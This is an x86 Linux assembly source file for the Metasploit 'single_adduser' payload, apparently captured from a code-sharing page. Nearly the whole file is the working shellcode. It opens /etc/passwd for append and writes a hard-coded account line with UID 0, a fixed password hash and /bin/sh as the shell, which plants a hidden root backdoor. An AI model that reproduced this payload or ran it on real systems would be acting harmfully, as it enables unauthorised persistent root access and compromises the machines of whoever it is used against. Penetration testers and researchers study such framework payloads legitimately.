Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;;
2
;
3
;        Name: single_adduser
4
;     Authors: vlad902 <vlad902 [at] gmail.com>
5
;     Authors: spoonm <ninjatools [at] hush.com>
6
;     Authors: skape <mmiller [at] hick.org>
7
;     Version: $Revision: 1513 $
8
;     License:
9
;
10
;        This file is part of the Metasploit Exploit Framework
11
;        and is subject to the same licenses and copyrights as
12
;        the rest of this package.
13
;
14
; Description:
15
;
16
;        Add a line to /etc/passwd.
17
;
18
; Meta-Information:
19
;
20
; meta-shortname=Linux adduser
21
; meta-description=Create an entry in /etc/passwd with UID=0
22
; meta-authors=vlad902 <vlad902 [at] gmail.com>, spoonm <ninjatools [at] hush.com>, skape <mmiller [at] hick.org>
23
; meta-os=linux
24
; meta-arch=ia32
25
; meta-category=single
26
; meta-name=adduser
27
; meta-basemod=Msf::PayloadComponent::NoConnection
28
; Offset for inserting the string:
29
; meta-custom1=0x27
30
; Offset after string:
31
; meta-custom2=0x4b
32
;;
33

34

35
BITS 32
36
global _start
37

38
%include "generic.asm"
39

40
_start:
41
  setreuid 0
42

43
  push  byte 0x05
44
  pop   eax
45

46
  xor   ecx, ecx
47
  push  ecx
48
  push  dword 0x64777373
49
  push  dword 0x61702f2f
50
  push  dword 0x6374652f
51
  mov   ebx, esp
52
  inc   ecx
53
  mov   ch, 0x04
54
  int   0x80
55

56
  xchg  eax, ebx
57
  call  getstr
58
db "ABC:AAnV3m35vbc/g:0:0::/:/bin/sh"
59
getstr:
60
  pop   ecx
61
  mov   edx, [ecx-4]
62
  push  byte 0x04
63
  pop   eax
64
  int   0x80
65

66
  push  byte 0x01
67
  pop   eax
68
  int   0x80
69

70